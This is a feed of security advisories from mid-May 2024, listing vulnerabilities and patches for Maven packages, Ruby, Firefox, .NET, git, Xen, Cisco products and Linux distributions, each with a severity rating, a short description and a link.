15.05.2024 00:37:55 | maven | [MAVEN:GHSA-G95V-3PJ6-J433] Ant Media Server does not properly authorize non-administrative API calls (moderate) | Ant Media Server Community Edition in a default configuration is vulnerable to an improper HTTP header based authorization, leading to a possible use of non-administrative API calls reserved only for authorized users. All versions up to 2.9.0 (tested) and possibly newer ones are believed to be vulnerable as the vendor has not confirmed releasing a patch. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G95V-3PJ6-J433
15.05.2024 00:37:06 | maven | [MAVEN:GHSA-338X-HFX8-VX9X] Apache Karaf Cave: Cave SSRF and arbitrary file access (critical) | This issue affects all versions of Apache Karaf Cave. As this project is retired, there are no plans to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-338X-HFX8-VX9X
14.05.2024 23:22:08 | maven | [MAVEN:GHSA-M44J-CFRM-G8QC] Bouncy Castle crafted signature and public key can be used to trigger an infinite loop (moderate) | An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M44J-CFRM-G8QC
14.05.2024 23:22:06 | maven | [MAVEN:GHSA-V435-XC8X-WVR9] Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack") (moderate) | An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V435-XC8X-WVR9
14.05.2024 23:22:02 | maven | [MAVEN:GHSA-8XFC-GM6G-VGPV] Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation. (moderate) | An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8XFC-GM6G-VGPV
14.05.2024 18:11:57 | alpinelinux | [ALPINE:CVE-2024-27282] ruby vulnerability | [From CVE-2024-27282] An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27282
14.05.2024 18:11:57 | alpinelinux | [ALPINE:CVE-2024-27281] ruby vulnerability | [From CVE-2024-27281] An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. (When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache.) The main fixed version is 6.6.3.1. For Ruby 3.0 users, a fixed version is rdoc 6.3.4.1. For Ruby 3.1 users, a fixed version is rdoc 6.4.1.1. For Ruby 3.2 users, a fixed version is rdoc 6.5.1.1. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27281
14.05.2024 18:11:56 | alpinelinux | [ALPINE:CVE-2024-27280] ruby vulnerability | [From CVE-2024-27280] A buffer-overread issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x through 3.0.6 and 3.1.x through 3.1.4. The ungetbyte and ungetc methods on a StringIO can read past the end of a string, and a subsequent call to StringIO.gets may return the memory value. 3.0.3 is the main fixed version; however, for Ruby 3.0 users, a fixed version is stringio 3.0.1.1, and for Ruby 3.1 users, a fixed version is stringio 3.0.1.2. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27280
14.05.2024 18:05:29 | alpinelinux | [ALPINE:CVE-2024-25581] dnsdist vulnerability (high) | [From CVE-2024-25581] When incoming DNS over HTTPS support is enabled using the nghttp2 provider, and queries are routed to a tcp-only or DNS over TLS backend, an attacker can trigger an assertion failure in DNSdist by sending a request for a zone transfer (AXFR or IXFR) over DNS over HTTPS, causing the process to stop and thus leading to a Denial of Service. DNS over HTTPS is not enabled by default, and backends are using plain DNS (Do53) by default. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-25581
14.05.2024 14:20:27 | ubuntu | [USN-6772-1] strongSwan vulnerability (high) | Fraudulent security certificates could allow access controls to be bypassed. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6772-1
14.05.2024 12:00:08 | ubuntu | [USN-6767-2] Linux kernel (BlueField) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6767-2
14.05.2024 03:00:00 | cisa | [CISA-2024:0514] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high) | CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0514
14.05.2024 03:00:00 | mozilla | [MFSA-2024-21] Security Vulnerabilities fixed in Firefox 126 (high) | - CVE-2024-4367: Arbitrary JavaScript execution in PDF.js (high): A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. - CVE-2024-4764: Use-after-free when audio input connected with multiple consumers (high): Multiple WebRTC threads could have claimed a newly connected audio input leading to use-after-free. - CVE-2024-4765: Web application manifests could have been overwritten via hash collision (moderate): Web application manifests were stored by using an insecure MD5 hash which allowed for a hash collision to overwrite another application's manifest. This could have been exploited to run arbitrary code in another application's context. This issue only affects Firefox for Android. Other versions of Firefox are unaffected. - CVE-2024-4766: Fullscreen notification could have been obscured on Firefox for Android (moderate): Different techniques existed to obscure the fullscreen notification in Firefox for Android. These could have led to potential user confusion and spoofing attacks. This bug only affects Firefox for Android. Other versions of Firefox are unaffected. - CVE-2024-4767: IndexedDB files retained in private browsing mode (moderate): If the `browser.privatebrowsing.autostart` preference is enabled, IndexedDB files were not properly deleted when the window was closed. This preference is disabled by default in Firefox. - CVE-2024-4768: Potential permissions request bypass via clickjacking (moderate): A bug in popup notifications' interaction with WebAuthn made it easier for an attacker to trick a user into granting permissions. - CVE-2024-4769: Cross-origin responses could be distinguished between script and non-script content-types (moderate): When importing resources using Web Workers, error messages would distinguish the difference between `application/javascript` responses and non-script responses. This could have been abused to learn information cross-origin. - CVE-2024-4770: Use-after-free could occur when printing to PDF (moderate): When saving a page to PDF, certain font styles could have led to a potential use-after-free crash. - CVE-2024-4771: Failed allocation could lead to use-after-free (moderate): A memory allocation check was missing which would lead to a use-after-free if the allocation failed. This could have triggered a crash or potentially be leveraged to achieve code execution. - CVE-2024-4772: Use of insecure rand() function to generate nonce (low): An HTTP digest authentication nonce value was generated using `rand()` which could lead to predictable values. - CVE-2024-4773: URL bar could be cleared after network error (low): When a network error occurred during page load, the prior content could have remained in view with a blank URL bar. This could have been used to obfuscate a spoofed web site. - CVE-2024-4774: Undefined behavior in ShmemCharMapHashEntry() (low): The `ShmemCharMapHashEntry()` code was susceptible to potentially undefined behavior by bypassing the move semantics for one of its data members. - CVE-2024-4775: Invalid memory access in the built-in profiler (low): An iterator stop condition was missing when handling WASM code in the built-in profiler, potentially leading to invalid memory access and undefined behavior. Note: This issue only affects the application when the profiler is running. - CVE-2024-4776: Window may remain disabled after file dialog is shown in full-screen (low): A file dialog shown while in full-screen mode could have resulted in the window remaining disabled. - CVE-2024-4777: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (moderate): Memory safety bugs present in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. - CVE-2024-4778: Memory safety bugs fixed in Firefox 126 (moderate): Memory safety bugs present in Firefox 125. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-21
14.05.2024 03:00:00 | mozilla | [MFSA-2024-22] Security Vulnerabilities fixed in Firefox ESR 115.11 (high) | - CVE-2024-4367: Arbitrary JavaScript execution in PDF.js (high): A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. - CVE-2024-4767: IndexedDB files retained in private browsing mode (moderate): If the `browser.privatebrowsing.autostart` preference is enabled, IndexedDB files were not properly deleted when the window was closed. This preference is disabled by default in Firefox. - CVE-2024-4768: Potential permissions request bypass via clickjacking (moderate): A bug in popup notifications' interaction with WebAuthn made it easier for an attacker to trick a user into granting permissions. - CVE-2024-4769: Cross-origin responses could be distinguished between script and non-script content-types (moderate): When importing resources using Web Workers, error messages would distinguish the difference between `application/javascript` responses and non-script responses. This could have been abused to learn information cross-origin. - CVE-2024-4770: Use-after-free could occur when printing to PDF (moderate): When saving a page to PDF, certain font styles could have led to a potential use-after-free crash. - CVE-2024-4777: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (moderate): Memory safety bugs present in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. | https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-22
14.05.2024 03:00:00 | oraclelinux | [ELSA-2024-2779] nodejs:18 security update (important) | nodejs [1:18.20.2-2] - Removes .ps1 files - Rebase to 18.20.2 - Fixes: CVE-2024-27983, CVE-2024-28182, CVE-2024-27982, CVE-2024-25629; nodejs-nodemon; nodejs-packaging | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2779
14.05.2024 03:00:00 | redhat | [RHSA-2024:2842] .NET 8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.105 and .NET Runtime 8.0.5. Security Fix(es): * dotnet: stack buffer overrun in Double Parse (CVE-2024-30045) * dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2842
14.05.2024 03:00:00 | freebsd | [FREEBSD:8E0E8B56-11C6-11EF-9F97-A8A1599412C6] chromium -- multiple security fixes | Chrome Releases reports: This update includes 1 security fix: [339458194] High CVE-2024-4761: Out of bounds write in V8. Reported by Anonymous on 2024-05-09 | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:8E0E8B56-11C6-11EF-9F97-A8A1599412C6
14.05.2024 23:36:47 | rubysec | [RUBYSEC:NOKOGIRI-R95H-9X8F-R3F7] Nokogiri updates packaged libxml2 to v2.12.7 to resolve CVE-2024-34459 | Summary: Nokogiri v1.16.5 upgrades its dependency libxml2 to 2.12.7 (https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7) from 2.12.6. libxml2 v2.12.7 addresses CVE-2024-34459: - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/720 - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53 Impact: There is no impact to Nokogiri users because the issue is present only in libxml2's `xmllint` tool which Nokogiri does not provide or expose. Timeline: - 2024-05-13 05:57 EDT, libxml2 2.12.7 release is announced - 2024-05-13 08:30 EDT, nokogiri maintainers begin triage - 2024-05-13 10:05 EDT, nokogiri v1.16.5 is released (https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5) and this GHSA made public | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:NOKOGIRI-R95H-9X8F-R3F7
17.05.2024 00:15:59 | alpinelinux | [ALPINE:CVE-2023-46103] intel-ucode vulnerability (medium) | [From CVE-2023-46103] Sequence of processor instructions leads to unexpected behavior in Intel(R) Core(TM) Ultra Processors may allow an authenticated user to potentially enable denial of service via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46103
17.05.2024 00:15:58 | alpinelinux | [ALPINE:CVE-2023-45745] intel-ucode vulnerability (high) | [From CVE-2023-45745] Improper input validation in some Intel(R) TDX module software before version 1.5.05.46.698 may allow a privileged user to potentially enable escalation of privilege via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45745
17.05.2024 00:15:57 | alpinelinux | [ALPINE:CVE-2023-45733] intel-ucode vulnerability (low) | [From CVE-2023-45733] Hardware logic contains race conditions in some Intel(R) Processors may allow an authenticated user to potentially enable partial information disclosure via local access. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45733
16.05.2024 20:41:52 | ubuntu | [USN-6778-1] Linux kernel vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6778-1
16.05.2024 20:16:03 | ubuntu | [USN-6777-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-1
16.05.2024 19:47:34 | ubuntu | [USN-6776-1] Linux kernel vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6776-1
16.05.2024 18:39:35 | ubuntu | [USN-6775-1] Linux kernel vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6775-1
16.05.2024 17:27:39 | ubuntu | [USN-6774-1] Linux kernel vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6774-1
16.05.2024 17:15:08 | alpinelinux | [ALPINE:CVE-2023-46842] xen vulnerability | [From CVE-2023-46842] Unlike 32-bit PV guests, HVM guests may switch freely between 64-bit and other modes. This in particular means that they may set registers used to pass 32-bit-mode hypercall arguments to values outside of the range 32-bit code would be able to set them to. When processing of hypercalls takes a considerable amount of time, the hypervisor may choose to invoke a hypercall continuation. Doing so involves putting (perhaps updated) hypercall arguments in respective registers. For guests not running in 64-bit mode this further involves a certain amount of translation of the values. Unfortunately internal sanity checking of these translated values assumes high halves of registers to always be clear when invoking a hypercall. When this is found not to be the case, it triggers a consistency check in the hypervisor and causes a crash. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46842
16.05.2024 17:15:08 | alpinelinux | [ALPINE:CVE-2024-31142] xen vulnerability | [From CVE-2024-31142] Because of a logical error in XSA-407 (Branch Type Confusion), the mitigation is not applied properly when it is intended to be used. XSA-434 (Speculative Return Stack Overflow) uses the same infrastructure, so is equally impacted. For more details, see: https://xenbits.xen.org/xsa/advisory-407.html https://xenbits.xen.org/xsa/advisory-434.html | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31142
16.05.2024 16:40:01 | ubuntu | [USN-6773-1] .NET vulnerabilities (medium) | Several security issues were fixed in .NET. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6773-1
16.05.2024 05:33:18slackware[SSA:2024-136-02] git (critical)New git packages are available for Slackware 15.0 and -current tofix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/git-2.39.4-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Recursive clones on case-insensitive filesystems that support symbolic links are susceptible to case confusion that can be exploited to execute just-cloned code during the clone operation. Repositories can be configured to execute arbitrary code during local clones. To address this, the ownership checks introduced in v2.30.3 are now extended to cover cloning local repositories. Local clones may end up hardlinking files into the target repository's object database when source and target repository reside on the same disk. If the source repository is owned by a different user, then those hardlinked files may be rewritten at any point in time by the untrusted user. When cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the objects/ directory. It is supposed to be safe to clone untrusted repositories, even those unpacked from zip archives or tarballs originating from untrusted sources, but Git can be tricked to run arbitrary code as part of the clone. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-32002 https://www.cve.org/CVERecord?id=CVE-2024-32004 https://www.cve.org/CVERecord?id=CVE-2024-32020 https://www.cve.org/CVERecord?id=CVE-2024-32021 https://www.cve.org/CVERecord?id=CVE-2024-32465 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! 
:-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/git-2.39.4-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/git-2.39.4-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.45.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.45.1-x86_64-1.txz**MD5 signatures**Slackware 15.0 package:837b659cb32a07eed09bf4de30b72741 git-2.39.4-i586-1_slack15.0.txzSlackware x86_64 15.0 package:530b3158ef258881e1a340baff5d61b5 git-2.39.4-x86_64-1_slack15.0.txzSlackware -current package:0f6950f7d7f336e7aa2d47d4a4711bc9 d/git-2.45.1-i586-1.txzSlackware x86_64 -current package:685fddae35e6b5d4366104f1c05ccd43 d/git-2.45.1-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg git-2.39.4-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-136-02
16.05.2024 05:32:59slackware[SSA:2024-136-01] gdk-pixbuf2 (high)New gdk-pixbuf2 packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz: Upgraded. ani: Reject files with multiple INA or IART chunks. ani: Reject files with multiple anih chunks. ani: validate chunk size. Thanks to 0xvhp, pedrib, and Benjamin Gilbert. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-48622 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gdk-pixbuf2-2.42.12-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/gdk-pixbuf2-2.42.12-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/gdk-pixbuf2-2.42.12-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: b4be8911d6f57b20a18d0dd5ce4ac42a gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 5abbb8e210dd3567b105cb78f4f78552 gdk-pixbuf2-2.42.12-x86_64-1_slack15.0.txz Slackware -current package: f4b995edbc7e21a1b2d837284aefb004 l/gdk-pixbuf2-2.42.12-i586-1.txz Slackware x86_64 -current package: 6e8c1d8a5aca9bb2f5967d8a5d15def4 l/gdk-pixbuf2-2.42.12-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg gdk-pixbuf2-2.42.12-i586-1_slack15.0.txz` https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-136-01
16.05.2024 03:00:00cisa[CISA-2024:0516] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0516
16.05.2024 03:00:00oraclelinux[ELSA-2024-2853] nodejs:20 security update (important)nodejs [1:20.12.2-2] - Backport nghttp2 patch for CVE-2024-28182 [1:20.12.2-1] - Rebase to version 20.12.0 Fixes: CVE-2024-27983 CVE-2024-27982 CVE-2024-22025 (node) Fixes: CVE-2024-25629 (c-ares) nodejs-nodemon nodejs-packaging https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2853
16.05.2024 03:00:00oraclelinux[ELSA-2024-2881] firefox security update (important)[115.11.0-1.0.1] - Remove upstream references [Orabug: 30143292] - Update distribution for Oracle Linux [Orabug: 30143292] - Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file [115.11.0-1] - Update to 115.11.0 build1 https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2881
16.05.2024 23:19:21rubysec[RUBYSEC:REXML-2024-35176] REXML contains a denial of service vulnerability (medium)### Impact The REXML gem before 3.2.6 has a DoS vulnerability when it parses an XML that has many `<`s in an attribute value. If you need to parse untrusted XMLs, you may be impacted by this vulnerability. ### Patches The REXML gem 3.2.7 or later includes the patch to fix this vulnerability. ### Workarounds Don't parse untrusted XMLs. ### References * https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/ https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-35176
16.05.2024 03:00:00redhat[RHSA-2024:2881] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 115.11.0 ESR. Security Fix(es): * firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367) * firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767) * firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768) * firefox: Cross-origin responses could be distinguished between script and non-script content-types (CVE-2024-4769) * firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770) * firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (CVE-2024-4777) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2881
16.05.2024 03:00:00redhat[RHSA-2024:2883] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 115.11.0 ESR. Security Fix(es): * firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367) * firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767) * firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768) * firefox: Cross-origin responses could be distinguished between script and non-script content-types (CVE-2024-4769) * firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770) * firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (CVE-2024-4777) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2883
16.05.2024 03:00:00redhat[RHSA-2024:2888] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 115.11.0. Security Fix(es): * firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367) * firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767) * firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768) * firefox: Cross-origin responses could be distinguished between script and non-script content-types (CVE-2024-4769) * firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770) * firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (CVE-2024-4777) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2888
15.05.2024 22:48:34maven[MAVEN:GHSA-76V2-48W6-CRXR] Bonitasoft Runtime Community edition contains an insecure direct object references vulnerability (moderate)In Bonitasoft runtime Community edition, the lack of dynamic permissions causes an IDOR vulnerability. Dynamic permissions existed only in the Subscription edition and have now been restored in the Community edition, where they are not customizable. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-76V2-48W6-CRXR
15.05.2024 20:10:52maven[MAVEN:GHSA-X3WM-HFFR-CHWM] Amazon JDBC Driver for Redshift SQL Injection via line comment generation (critical)### Impact SQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code which has a vulnerable SQL that negates a parameter value. There is no vulnerability in the driver when using the default, extended query mode. Note that `preferQueryMode` is not a supported parameter in Redshift JDBC driver, and is inherited code from Postgres JDBC driver. Users who do not override default settings to utilize this unsupported query mode are not affected. ### Patch This issue is patched in driver version 2.1.0.28. ### Workarounds Do not use the connection property `preferQueryMode=simple`. (NOTE: If you do not explicitly specify a query mode, then you are using the default of extended query mode and are not affected by this issue.) ### References Similar to finding in Postgres JDBC: https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56 If you have any questions or comments about this advisory, we ask that you contact AWS Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X3WM-HFFR-CHWM
15.05.2024 19:00:00cisco[CISCO-SA-NSO-RWPESC-QRQGNH3F] Cisco Crosswork Network Services Orchestrator Vulnerabilities (high)Multiple vulnerabilities in the Cisco Crosswork Network Services Orchestrator (NSO) CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root or elevate privileges to root on the underlying operating system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-RWPESC-QRQGNH3F
15.05.2024 19:00:00cisco[CISCO-SA-CNFD-RWPESC-ZAOUFYX8] ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities (high)Multiple vulnerabilities in the ConfD CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root or elevate privileges to root on the underlying operating system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CNFD-RWPESC-ZAOUFYX8
15.05.2024 19:00:00cisco[CISCO-SA-SECURE-NAM-PRIV-ESC-SZU2VYPZ] Cisco Secure Client for Windows with Network Access Manager Module Privilege Escalation Vulnerability (medium)A vulnerability in the Network Access Manager (NAM) module of Cisco Secure Client could allow an unauthenticated attacker with physical access to an affected device to elevate privileges to SYSTEM.This vulnerability is due to a lack of authentication on a specific function. A successful exploit could allow the attacker to execute arbitrary code with SYSTEM privileges on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-NAM-PRIV-ESC-SZU2VYPZ
15.05.2024 19:00:00cisco[CISCO-SA-NSO-ORDIR-MNM8YQZO] Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Crosswork Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.This vulnerability is due to improper input validation of a parameter in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-ORDIR-MNM8YQZO
15.05.2024 19:00:00cisco[CISCO-SA-NSO-HCC-PRIV-ESC-OWBWCS5D] Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability (high)A vulnerability in the Tail-f High Availability Cluster Communications (HCC) function pack of Cisco Crosswork Network Services Orchestrator (NSO) could allow an authenticated, local attacker to elevate privileges to root on an affected device.This vulnerability exists because a user-controlled search path is used to locate executable files. An attacker could exploit this vulnerability by configuring the application in a way that causes a malicious file to be executed. A successful exploit could allow the attacker to execute arbitrary code on an affected device as the root user. To exploit this vulnerability, the attacker would need valid credentials on an affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-HCC-PRIV-ESC-OWBWCS5D
15.05.2024 19:00:00cisco[CISCO-SA-ESA-SMA-WSA-XSS-BGG5WHOD] Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Cross-Site Scripting Vulnerabilities (medium)Multiple vulnerabilities in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager; Secure Email Gateway, formerly Email Security Appliance (ESA); and Secure Web Appliance could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-SMA-WSA-XSS-BGG5WHOD
